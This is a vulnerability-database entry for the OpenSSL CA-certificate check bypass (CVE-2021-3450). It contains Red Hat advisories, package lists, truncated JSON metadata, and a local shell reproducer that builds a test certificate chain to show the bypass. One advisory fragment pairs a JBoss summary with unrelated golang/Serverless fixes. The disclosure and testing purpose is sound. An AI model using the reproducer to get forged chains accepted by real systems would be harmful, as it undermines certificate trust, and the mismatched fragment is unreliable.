var-202103-1463
Vulnerability from variot
The X509_V_FLAG_X509_STRICT flag enables additional security checks of the certificates present in a certificate chain. It is not set by default. Starting from OpenSSL version 1.1.1h a check to disallow certificates in the chain that have explicitly encoded elliptic curve parameters was added as an additional strict check. An error in the implementation of this check meant that the result of a previous check to confirm that certificates in the chain are valid CA certificates was overwritten. This effectively bypasses the check that non-CA certificates must not be able to issue other certificates. If a "purpose" has been configured then there is a subsequent opportunity for checks that the certificate is a valid CA. All of the named "purpose" values implemented in libcrypto perform this check. Therefore, where a purpose is set the certificate chain will still be rejected even when the strict flag has been used. A purpose is set by default in libssl client and server certificate verification routines, but it can be overridden or removed by an application. In order to be affected, an application must explicitly set the X509_V_FLAG_X509_STRICT verification flag and either not set a purpose for the certificate verification or, in the case of TLS client or server applications, override the default purpose. OpenSSL 1.1.1h through 1.1.1j are affected; the issue is fixed in OpenSSL 1.1.1k, and users of the affected versions should upgrade to 1.1.1k. OpenSSL 1.0.2 is not impacted by this issue. OpenSSL is an open source general-purpose cryptography library from the OpenSSL project that implements the Secure Sockets Layer (SSLv2/v3) and Transport Layer Security (TLSv1) protocols and supports a wide range of algorithms, including symmetric ciphers and hash algorithms.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
=====================================================================
                   Red Hat Security Advisory

Synopsis:          Important: Red Hat Virtualization security, bug fix, and enhancement update
Advisory ID:       RHSA-2021:1189-01
Product:           Red Hat Virtualization
Advisory URL:      https://access.redhat.com/errata/RHSA-2021:1189
Issue date:        2021-04-14
CVE Names:         CVE-2021-3449 CVE-2021-3450
=====================================================================
1. Summary:
An update is now available for Red Hat Virtualization 4 for Red Hat Enterprise Linux 8.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
2. Relevant releases/architectures:

RHEL 8-based RHEV-H for RHEV 4 (build requirements) - noarch, x86_64
Red Hat Virtualization 4 Hypervisor for RHEL 8 - noarch, x86_64
3. Description:
The redhat-virtualization-host packages provide the Red Hat Virtualization Host. These packages include redhat-release-virtualization-host, ovirt-node, and rhev-hypervisor. Red Hat Virtualization Hosts (RHVH) are installed using a special build of Red Hat Enterprise Linux with only the packages required to host virtual machines. RHVH features a Cockpit user interface for monitoring the host's resources and performing administrative tasks.
The ovirt-node-ng packages provide the Red Hat Virtualization Host. These packages include redhat-release-virtualization-host, ovirt-node, and rhev-hypervisor. Red Hat Virtualization Hosts (RHVH) are installed using a special build of Red Hat Enterprise Linux with only the packages required to host virtual machines. RHVH features a Cockpit user interface for monitoring the host's resources and performing administrative tasks.
Changes to the redhat-release-virtualization-host component:
- Previously, the redhat-support-tool was missing from the RHV-H 4.4 package. In this release, the redhat-support-tool has been added. (BZ#1928607)
Security Fix(es):
- openssl: NULL pointer dereference in signature_algorithms processing (CVE-2021-3449)
- openssl: CA certificate check bypass with X509_V_FLAG_X509_STRICT (CVE-2021-3450)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
4. Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/2974891
The system must be rebooted for this update to take effect. For the update to take effect, all services linked to the glibc library must be restarted, or the system rebooted.
5. Bugs fixed (https://bugzilla.redhat.com/):

1892573 - RHVH 4.4.2 fails to boot from SAN when using UUID for /boot partition
1895832 - RHVH 4.4.3: No response when clicking button "Help" in Anaconda GUI
1907306 - "sysstat" doesn't collect data for upgraded RHVH
1907358 - In FIPS mode, RHVH cannot enter the new layer after upgrade
1907746 - RHVH cannot enter the new layer after upgrade testing with STIG profile selected.
1918207 - RHVH upgrade to 4.4.5-1 will fail due to FileNotFoundError
1927395 - RHVH, protecting key packages from being removed.
1928607 - redhat-support-tool is missing from latest RHV-H 4.4
1940845 - Include updated gluster-ansible-features in RHV-H 4.4.5
1941547 - CVE-2021-3450 openssl: CA certificate check bypass with X509_V_FLAG_X509_STRICT
1941554 - CVE-2021-3449 openssl: NULL pointer dereference in signature_algorithms processing
1942040 - Rebase RHV-H 4.4.5 on RHEL-AV 8.3.1 Async
1942498 - Rebase RHV-H 4.4.5 on RHEL-8.3.1.3
6. Package List:
Red Hat Virtualization 4 Hypervisor for RHEL 8:
Source:
boost-1.66.0-10.el8.src.rpm
dyninst-10.1.0-4.el8.src.rpm
gcc-8.3.1-5.1.el8.src.rpm
isl-0.16.1-6.el8.src.rpm
libmpc-1.0.2-9.el8.src.rpm
libxcrypt-4.1.1-4.el8.src.rpm
make-4.2.1-10.el8.src.rpm
redhat-virtualization-host-4.4.5-20210330.0.el8_3.src.rpm
tbb-2018.2-9.el8.src.rpm
zip-3.0-23.el8.src.rpm

noarch:
redhat-virtualization-host-image-update-4.4.5-20210330.0.el8_3.noarch.rpm
vim-filesystem-8.0.1763-15.el8.noarch.rpm

x86_64:
boost-atomic-debuginfo-1.66.0-10.el8.x86_64.rpm
boost-chrono-debuginfo-1.66.0-10.el8.x86_64.rpm
boost-container-debuginfo-1.66.0-10.el8.x86_64.rpm
boost-context-debuginfo-1.66.0-10.el8.x86_64.rpm
boost-coroutine-debuginfo-1.66.0-10.el8.x86_64.rpm
boost-date-time-1.66.0-10.el8.x86_64.rpm
boost-date-time-debuginfo-1.66.0-10.el8.x86_64.rpm
boost-debuginfo-1.66.0-10.el8.x86_64.rpm
boost-debugsource-1.66.0-10.el8.x86_64.rpm
boost-doctools-debuginfo-1.66.0-10.el8.x86_64.rpm
boost-fiber-debuginfo-1.66.0-10.el8.x86_64.rpm
boost-filesystem-debuginfo-1.66.0-10.el8.x86_64.rpm
boost-graph-debuginfo-1.66.0-10.el8.x86_64.rpm
boost-graph-mpich-debuginfo-1.66.0-10.el8.x86_64.rpm
boost-graph-openmpi-debuginfo-1.66.0-10.el8.x86_64.rpm
boost-iostreams-debuginfo-1.66.0-10.el8.x86_64.rpm
boost-locale-debuginfo-1.66.0-10.el8.x86_64.rpm
boost-log-debuginfo-1.66.0-10.el8.x86_64.rpm
boost-math-debuginfo-1.66.0-10.el8.x86_64.rpm
boost-mpich-debuginfo-1.66.0-10.el8.x86_64.rpm
boost-mpich-python3-debuginfo-1.66.0-10.el8.x86_64.rpm
boost-numpy3-debuginfo-1.66.0-10.el8.x86_64.rpm
boost-openmpi-debuginfo-1.66.0-10.el8.x86_64.rpm
boost-openmpi-python3-debuginfo-1.66.0-10.el8.x86_64.rpm
boost-program-options-debuginfo-1.66.0-10.el8.x86_64.rpm
boost-python3-debuginfo-1.66.0-10.el8.x86_64.rpm
boost-random-debuginfo-1.66.0-10.el8.x86_64.rpm
boost-regex-debuginfo-1.66.0-10.el8.x86_64.rpm
boost-serialization-debuginfo-1.66.0-10.el8.x86_64.rpm
boost-signals-debuginfo-1.66.0-10.el8.x86_64.rpm
boost-stacktrace-debuginfo-1.66.0-10.el8.x86_64.rpm
boost-system-debuginfo-1.66.0-10.el8.x86_64.rpm
boost-test-debuginfo-1.66.0-10.el8.x86_64.rpm
boost-thread-debuginfo-1.66.0-10.el8.x86_64.rpm
boost-timer-debuginfo-1.66.0-10.el8.x86_64.rpm
boost-type_erasure-debuginfo-1.66.0-10.el8.x86_64.rpm
boost-wave-debuginfo-1.66.0-10.el8.x86_64.rpm
bpftool-debuginfo-4.18.0-240.22.1.el8_3.x86_64.rpm
compat-libmpc-debuginfo-1.0.2-9.el8.x86_64.rpm
cpp-8.3.1-5.1.el8.x86_64.rpm
cpp-debuginfo-8.3.1-5.1.el8.x86_64.rpm
dyninst-10.1.0-4.el8.x86_64.rpm
dyninst-debuginfo-10.1.0-4.el8.x86_64.rpm
dyninst-debugsource-10.1.0-4.el8.x86_64.rpm
dyninst-devel-debuginfo-10.1.0-4.el8.x86_64.rpm
dyninst-testsuite-debuginfo-10.1.0-4.el8.x86_64.rpm
gcc-8.3.1-5.1.el8.x86_64.rpm
gcc-c++-debuginfo-8.3.1-5.1.el8.x86_64.rpm
gcc-debuginfo-8.3.1-5.1.el8.x86_64.rpm
gcc-debugsource-8.3.1-5.1.el8.x86_64.rpm
gcc-gdb-plugin-debuginfo-8.3.1-5.1.el8.x86_64.rpm
gcc-gfortran-debuginfo-8.3.1-5.1.el8.x86_64.rpm
gcc-offload-nvptx-debuginfo-8.3.1-5.1.el8.x86_64.rpm
gcc-plugin-devel-debuginfo-8.3.1-5.1.el8.x86_64.rpm
glibc-debuginfo-2.28-127.el8_3.2.x86_64.rpm
glibc-debuginfo-common-2.28-127.el8_3.2.x86_64.rpm
glibc-devel-2.28-127.el8_3.2.x86_64.rpm
glibc-headers-2.28-127.el8_3.2.x86_64.rpm
isl-0.16.1-6.el8.x86_64.rpm
isl-debugsource-0.16.1-6.el8.x86_64.rpm
kernel-debug-debuginfo-4.18.0-240.22.1.el8_3.x86_64.rpm
kernel-debuginfo-4.18.0-240.22.1.el8_3.x86_64.rpm
kernel-debuginfo-common-x86_64-4.18.0-240.22.1.el8_3.x86_64.rpm
kernel-devel-4.18.0-240.22.1.el8_3.x86_64.rpm
kernel-headers-4.18.0-240.22.1.el8_3.x86_64.rpm
kernel-tools-debuginfo-4.18.0-240.22.1.el8_3.x86_64.rpm
libasan-debuginfo-8.3.1-5.1.el8.x86_64.rpm
libatomic-debuginfo-8.3.1-5.1.el8.x86_64.rpm
libgcc-8.3.1-5.1.el8.x86_64.rpm
libgcc-debuginfo-8.3.1-5.1.el8.x86_64.rpm
libgfortran-debuginfo-8.3.1-5.1.el8.x86_64.rpm
libgomp-8.3.1-5.1.el8.x86_64.rpm
libgomp-debuginfo-8.3.1-5.1.el8.x86_64.rpm
libgomp-offload-nvptx-debuginfo-8.3.1-5.1.el8.x86_64.rpm
libitm-debuginfo-8.3.1-5.1.el8.x86_64.rpm
liblsan-debuginfo-8.3.1-5.1.el8.x86_64.rpm
libmpc-1.0.2-9.el8.x86_64.rpm
libmpc-debuginfo-1.0.2-9.el8.x86_64.rpm
libmpc-debugsource-1.0.2-9.el8.x86_64.rpm
libquadmath-debuginfo-8.3.1-5.1.el8.x86_64.rpm
libstdc++-debuginfo-8.3.1-5.1.el8.x86_64.rpm
libtsan-debuginfo-8.3.1-5.1.el8.x86_64.rpm
libubsan-debuginfo-8.3.1-5.1.el8.x86_64.rpm
libxcrypt-debugsource-4.1.1-4.el8.x86_64.rpm
libxcrypt-devel-4.1.1-4.el8.x86_64.rpm
make-4.2.1-10.el8.x86_64.rpm
make-debugsource-4.2.1-10.el8.x86_64.rpm
perf-4.18.0-240.22.1.el8_3.x86_64.rpm
perf-debuginfo-4.18.0-240.22.1.el8_3.x86_64.rpm
python3-perf-debuginfo-4.18.0-240.22.1.el8_3.x86_64.rpm
tbb-2018.2-9.el8.x86_64.rpm
tbb-debugsource-2018.2-9.el8.x86_64.rpm
vim-X11-debuginfo-8.0.1763-15.el8.x86_64.rpm
vim-common-8.0.1763-15.el8.x86_64.rpm
vim-common-debuginfo-8.0.1763-15.el8.x86_64.rpm
vim-debuginfo-8.0.1763-15.el8.x86_64.rpm
vim-debugsource-8.0.1763-15.el8.x86_64.rpm
vim-enhanced-8.0.1763-15.el8.x86_64.rpm
vim-enhanced-debuginfo-8.0.1763-15.el8.x86_64.rpm
vim-minimal-debuginfo-8.0.1763-15.el8.x86_64.rpm
zip-3.0-23.el8.x86_64.rpm
zip-debugsource-3.0-23.el8.x86_64.rpm
RHEL 8-based RHEV-H for RHEV 4 (build requirements):
Source:
imgbased-1.2.18-0.1.el8ev.src.rpm
redhat-release-virtualization-host-4.4.5-4.el8ev.src.rpm
scap-security-guide-0.1.50-1.el8ev.src.rpm

noarch:
imgbased-1.2.18-0.1.el8ev.noarch.rpm
python3-imgbased-1.2.18-0.1.el8ev.noarch.rpm
redhat-virtualization-host-image-update-placeholder-4.4.5-4.el8ev.noarch.rpm
scap-security-guide-rhv-0.1.50-1.el8ev.noarch.rpm

x86_64:
redhat-release-virtualization-host-4.4.5-4.el8ev.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
7. References:

https://access.redhat.com/security/cve/CVE-2021-3449
https://access.redhat.com/security/cve/CVE-2021-3450
https://access.redhat.com/security/updates/classification/#important
8. Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2021 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQIVAwUBYHbW2dzjgjWX9erEAQhrvQ//VGyhTZ32NVUTnNMVVaHZyN5HL2Gt7CRG
sOA8Z7hKGGPq8nHZEeTtk2KBpxaLLzVHxKmILtnsRTlRqq2s4BSgd9j7YhNvTlZe
kK6Y3ovcWBKdqqui2ezZz9WFmKbQ5yjJImMo+TfyAS0D1RLwxNyKzDyYDCIZuO03
1AcV0ILWSVpaEKRrjOX6S0VnmMR0hqf4JmgLk8/ePv3wp+vd5voeIymWDPy6KrPW
0WS6NLHHNGucnzKXiRglwLeWKCYdQ+MCewkLKch/4eQPI28+N72dEgI9nhbZMind
khmKrnPDt5CIS9aWNmm+B/pWHZB1kEFt6hls/+xn2aXvrHxGgj6aTyl1peMhxYwA
bvlQx+p1jOOREgtvnQHwemAVEuZByW4QFWqdZn/BIqbImTjxlawqYRwHjWpOvMfo
Z6l7kiG86TsEWj/QJGAoRvwmqer7pWrttVeUivFBNmUhgZ8lEIMT3MkULY8VBJp+
PrwbQwfpMn38PZbnl/DT3A0aSgZ1Q1uQZooW8B6zBKYUdgwTU8impaBaKfyM9QRq
hCqHX42S4b/tNZhy64hlfkv24kei4RqgI4sGVeDfSA/tWzdgvBghQ1pOEhlPY4MH
jINgKocRD1f08X0meBmqk4IuoZdWkUrGgvprmT81At4ZF3omaQ1amKj1HhXpmJVa
da5fQnRzZzc=
=xbcY
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Summary:
Red Hat JBoss Core Services Pack Apache Server 2.4.37 Service Pack 7 zip release for RHEL 7, RHEL 8 and Microsoft Windows is available. This software, such as Apache HTTP Server, is common to multiple JBoss middleware products, and is packaged under Red Hat JBoss Core Services to allow for faster distribution of updates, and for a more consistent update experience.
This release adds the new Apache HTTP Server 2.4.37 Service Pack 7 packages that are part of the JBoss Core Services offering.
This release serves as a replacement for Red Hat JBoss Core Services Pack Apache Server 2.4.37 Service Pack 6 and includes bug fixes and enhancements. Refer to the Release Notes for information on the most significant bug fixes and enhancements included in this release.

Solution:
Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.
The References section of this erratum contains a download link for the update. You must be logged in to download the update.
Security Fix(es):
- golang: crypto/tls: certificate of wrong type is causing TLS client to panic (CVE-2021-34558)
- golang: net: lookup functions may return invalid host names (CVE-2021-33195)
- golang: net/http/httputil: ReverseProxy forwards connection headers if first one is empty (CVE-2021-33197)
- golang: math/big.Rat: may cause a panic or an unrecoverable fatal error if passed inputs with very large exponents (CVE-2021-33198)
- golang: encoding/xml: infinite loop when using xml.NewTokenDecoder with a custom TokenReader (CVE-2021-27918)
- golang: net/http: panic in ReadRequest and ReadResponse when reading a very large header (CVE-2021-31525)
- golang: archive/zip: malformed archive may cause panic or memory exhaustion (CVE-2021-33196)
It was found that CVE-2021-27918, CVE-2021-31525 and CVE-2021-33196 had been incorrectly listed as fixed in the RHSA for the Serverless client kn 1.16.0.

Bugs fixed (https://bugzilla.redhat.com/):

1983596 - CVE-2021-34558 golang: crypto/tls: certificate of wrong type is causing TLS client to panic
1983651 - Release of OpenShift Serverless Serving 1.17.0
1983654 - Release of OpenShift Serverless Eventing 1.17.0
1989564 - CVE-2021-33195 golang: net: lookup functions may return invalid host names
1989570 - CVE-2021-33197 golang: net/http/httputil: ReverseProxy forwards connection headers if first one is empty
1989575 - CVE-2021-33198 golang: math/big.Rat: may cause a panic or an unrecoverable fatal error if passed inputs with very large exponents
1992955 - CVE-2021-3703 serverless: incomplete fix for CVE-2021-27918 / CVE-2021-31525 / CVE-2021-33196
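The bypass described in the OpenSSL text at the top of this entry can be exercised with nothing but the openssl(1) command line: `openssl verify` exposes X509_V_FLAG_X509_STRICT as `-x509_strict` and, unlike libssl, sets no purpose unless `-purpose` is given, which is exactly the affected configuration. The script below is an added example, not code from the VARIoT entry, Red Hat or the OpenSSL project. It assumes an `openssl` binary (1.1.1 or 3.x) and `mktemp` on PATH, and constructs its own throwaway chain in which the intermediate "NotACA" carries no basicConstraints and no keyUsage, so it is an end-entity certificate that must never be accepted as an issuer. RSA keys are used deliberately so the explicit-EC-parameter check that introduced the bug is never reached and only the CA check is being exercised. A fixed build reports "rejected" in all three modes; an affected 1.1.1h-1.1.1j build reports "accepted" for `-x509_strict` alone and "rejected" again once a purpose is supplied.

```shell
#!/bin/sh
# Added reproducer for the CVE-2021-3450 condition (not code from the VARIoT
# entry, Red Hat or the OpenSSL project). Assumes `openssl` (1.1.1 or 3.x)
# and mktemp(1) on PATH. All certificates are constructed here:
#   root (CA:TRUE) -> "NotACA" (no basicConstraints, no keyUsage) -> leaf
# A correct verifier rejects the chain at depth 1 ("invalid CA certificate").
# OpenSSL 1.1.1h-1.1.1j accepts it when -x509_strict is set and no purpose is given.
set -eu

WORK="$(mktemp -d)"
trap 'rm -rf "$WORK"' EXIT

gen_chain() {
    # Self-signed root. `req -x509` adds basicConstraints CA:TRUE (from the
    # default config's v3_ca section on 1.1.1, built in on 3.x).
    openssl req -x509 -newkey rsa:2048 -nodes -subj /CN=ExampleRoot -days 2 \
        -keyout "$WORK/root.key" -out "$WORK/root.pem" >/dev/null 2>&1
    # NotACA: issued by root with no extensions at all, i.e. an end-entity cert.
    openssl req -newkey rsa:2048 -nodes -subj /CN=NotACA \
        -keyout "$WORK/mid.key" -out "$WORK/mid.csr" >/dev/null 2>&1
    openssl x509 -req -in "$WORK/mid.csr" -CA "$WORK/root.pem" \
        -CAkey "$WORK/root.key" -CAcreateserial -days 2 \
        -out "$WORK/mid.pem" >/dev/null 2>&1
    # leaf: "issued" by NotACA, which is precisely what must never validate.
    openssl req -newkey rsa:2048 -nodes -subj /CN=leaf.example \
        -keyout "$WORK/leaf.key" -out "$WORK/leaf.csr" >/dev/null 2>&1
    openssl x509 -req -in "$WORK/leaf.csr" -CA "$WORK/mid.pem" \
        -CAkey "$WORK/mid.key" -CAcreateserial -days 2 \
        -out "$WORK/leaf.pem" >/dev/null 2>&1
}

# verify_chain [extra flags for openssl verify] -> prints accepted|rejected.
# root.pem is the trust anchor, mid.pem is offered as an untrusted intermediate.
verify_chain() {
    if openssl verify -CAfile "$WORK/root.pem" -untrusted "$WORK/mid.pem" \
            "$@" "$WORK/leaf.pem" >/dev/null 2>&1; then
        echo accepted
    else
        echo rejected
    fi
}

# The CVE condition: strict flag set, no purpose, chain accepted. With a
# purpose (what libssl sets by default) the CA check runs again and wins.
cve_2021_3450_verdict() {
    if [ "$(verify_chain -x509_strict)" = accepted ] &&
       [ "$(verify_chain -x509_strict -purpose sslserver)" = rejected ]; then
        echo VULNERABLE
    else
        echo "not vulnerable"
    fi
}

gen_chain
printf '%-36s %s\n' 'default flags:' "$(verify_chain)"
printf '%-36s %s\n' '-x509_strict (no purpose):' "$(verify_chain -x509_strict)"
printf '%-36s %s\n' '-x509_strict -purpose sslserver:' "$(verify_chain -x509_strict -purpose sslserver)"
printf '%-36s %s\n' "$(openssl version):" "$(cve_2021_3450_verdict)"
```

The three outcomes map directly onto the library API: `X509_VERIFY_PARAM_set_flags(param, X509_V_FLAG_X509_STRICT)` without a matching `X509_VERIFY_PARAM_set_purpose()` is the affected configuration, while leaving libssl's default purpose in place, or setting one with `SSL_CTX_set_purpose()`, keeps the CA check effective even on an unpatched 1.1.1h-1.1.1j build.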
{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-202103-1463", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "storagegrid", "scope": "eq", "trust": 2.0, "vendor": "netapp", "version": null }, { "model": "ontap select deploy administration utility", "scope": "eq", "trust": 1.0, "vendor": "netapp", "version": null }, { "model": "cloud volumes ontap mediator", "scope": 
"eq", "trust": 1.0, "vendor": "netapp", "version": null }, { "model": "node.js", "scope": "lt", "trust": 1.0, "vendor": "nodejs", "version": "10.24.1" }, { "model": "node.js", "scope": "lt", "trust": 1.0, "vendor": "nodejs", "version": "15.14.0" }, { "model": "nessus agent", "scope": "gte", "trust": 1.0, "vendor": "tenable", "version": "8.2.1" }, { "model": "enterprise manager for storage management", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "13.4.0.0" }, { "model": "peoplesoft enterprise peopletools", "scope": "lte", "trust": 1.0, "vendor": "oracle", "version": "8.59" }, { "model": "sma100", "scope": "lt", "trust": 1.0, "vendor": "sonicwall", "version": "10.2.1.0-17sv" }, { "model": "nessus network monitor", "scope": "eq", "trust": 1.0, "vendor": "tenable", "version": "5.13.0" }, { "model": "node.js", "scope": "lt", "trust": 1.0, "vendor": "nodejs", "version": "12.22.1" }, { "model": "nessus network monitor", "scope": "eq", "trust": 1.0, "vendor": "tenable", "version": "5.12.0" }, { "model": "jd edwards enterpriseone tools", "scope": "lt", "trust": 1.0, "vendor": "oracle", "version": "9.2.6.0" }, { "model": "mysql server", "scope": "lte", "trust": 1.0, "vendor": "oracle", "version": "8.0.23" }, { "model": "capture client", "scope": "lt", "trust": 1.0, "vendor": "sonicwall", "version": "3.6.24" }, { "model": "jd edwards world security", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "a9.4" }, { "model": "openssl", "scope": "gte", "trust": 1.0, "vendor": "openssl", "version": "1.1.1h" }, { "model": "oncommand workflow automation", "scope": "eq", "trust": 1.0, "vendor": "netapp", "version": null }, { "model": "node.js", "scope": "gte", "trust": 1.0, "vendor": "nodejs", "version": "10.0.0" }, { "model": "linux", "scope": "eq", "trust": 1.0, "vendor": "windriver", "version": null }, { "model": "weblogic server", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "14.1.1.0.0" }, { "model": "mysql connectors", "scope": "lte", 
"trust": 1.0, "vendor": "oracle", "version": "8.0.23" }, { "model": "secure global desktop", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "5.6" }, { "model": "web gateway", "scope": "eq", "trust": 1.0, "vendor": "mcafee", "version": "10.1.1" }, { "model": "secure backup", "scope": "lt", "trust": 1.0, "vendor": "oracle", "version": "18.1.0.1.0" }, { "model": "santricity smi-s provider", "scope": "eq", "trust": 1.0, "vendor": "netapp", "version": null }, { "model": "peoplesoft enterprise peopletools", "scope": "gte", "trust": 1.0, "vendor": "oracle", "version": "8.57" }, { "model": "fedora", "scope": "eq", "trust": 1.0, "vendor": "fedoraproject", "version": "34" }, { "model": "mysql server", "scope": "lte", "trust": 1.0, "vendor": "oracle", "version": "5.7.33" }, { "model": "mysql server", "scope": "gte", "trust": 1.0, "vendor": "oracle", "version": "8.0.15" }, { "model": "node.js", "scope": "gte", "trust": 1.0, "vendor": "nodejs", "version": "12.0.0" }, { "model": "linux", "scope": "eq", "trust": 1.0, "vendor": "windriver", "version": "18.0" }, { "model": "commerce guided search", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "11.3.2" }, { "model": "mysql enterprise monitor", "scope": "lte", "trust": 1.0, "vendor": "oracle", "version": "8.0.23" }, { "model": "web gateway", "scope": "eq", "trust": 1.0, "vendor": "mcafee", "version": "8.2.19" }, { "model": "nessus network monitor", "scope": "eq", "trust": 1.0, "vendor": "tenable", "version": "5.11.0" }, { "model": "mysql workbench", "scope": "lte", "trust": 1.0, "vendor": "oracle", "version": "8.0.23" }, { "model": "web gateway", "scope": "eq", "trust": 1.0, "vendor": "mcafee", "version": "9.2.10" }, { "model": "nessus network monitor", "scope": "eq", "trust": 1.0, "vendor": "tenable", "version": "5.12.1" }, { "model": "node.js", "scope": "gte", "trust": 1.0, "vendor": "nodejs", "version": "14.0.0" }, { "model": "node.js", "scope": "lt", "trust": 1.0, "vendor": "nodejs", "version": 
"14.16.1" }, { "model": "node.js", "scope": "gte", "trust": 1.0, "vendor": "nodejs", "version": "15.0.0" }, { "model": "linux", "scope": "eq", "trust": 1.0, "vendor": "windriver", "version": "19.0" }, { "model": "web gateway cloud service", "scope": "eq", "trust": 1.0, "vendor": "mcafee", "version": "8.2.19" }, { "model": "web gateway cloud service", "scope": "eq", "trust": 1.0, "vendor": "mcafee", "version": "10.1.1" }, { "model": "graalvm", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "19.3.5" }, { "model": "weblogic server", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "12.2.1.4.0" }, { "model": "nessus", "scope": "lte", "trust": 1.0, "vendor": "tenable", "version": "8.13.1" }, { "model": "sonicos", "scope": "lte", "trust": 1.0, "vendor": "sonicwall", "version": "7.0.1-r1456" }, { "model": "nessus network monitor", "scope": "eq", "trust": 1.0, "vendor": "tenable", "version": "5.11.1" }, { "model": "nessus agent", "scope": "lte", "trust": 1.0, "vendor": "tenable", "version": "8.2.3" }, { "model": "linux", "scope": "eq", "trust": 1.0, "vendor": "windriver", "version": "17.0" }, { "model": "graalvm", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "20.3.1.2" }, { "model": "freebsd", "scope": "eq", "trust": 1.0, "vendor": "freebsd", "version": "12.2" }, { "model": "web gateway cloud service", "scope": "eq", "trust": 1.0, "vendor": "mcafee", "version": "9.2.10" }, { "model": "graalvm", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "21.0.0.2" }, { "model": "openssl", "scope": "lt", "trust": 1.0, "vendor": "openssl", "version": "1.1.1k" }, { "model": "email security", "scope": "lt", "trust": 1.0, "vendor": "sonicwall", "version": "10.0.11" } ], "sources": [ { "db": "NVD", "id": "CVE-2021-3450" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Red Hat", "sources": [ 
{ "db": "PACKETSTORM", "id": "162694" }, { "db": "PACKETSTORM", "id": "162172" }, { "db": "PACKETSTORM", "id": "162307" }, { "db": "PACKETSTORM", "id": "162197" }, { "db": "PACKETSTORM", "id": "164192" }, { "db": "CNNVD", "id": "CNNVD-202103-1456" } ], "trust": 1.1 }, "cve": "CVE-2021-3450", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "NONE", "baseScore": 5.8, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.6, "id": "CVE-2021-3450", "impactScore": 4.9, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 1.0, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N", "version": "2.0" }, { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "NONE", "baseScore": 5.8, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.6, "id": "VHN-388430", "impactScore": 4.9, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:N/AC:M/AU:N/C:P/I:P/A:N", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "HIGH", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "NONE", "baseScore": 7.4, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "exploitabilityScore": 2.2, "id": 
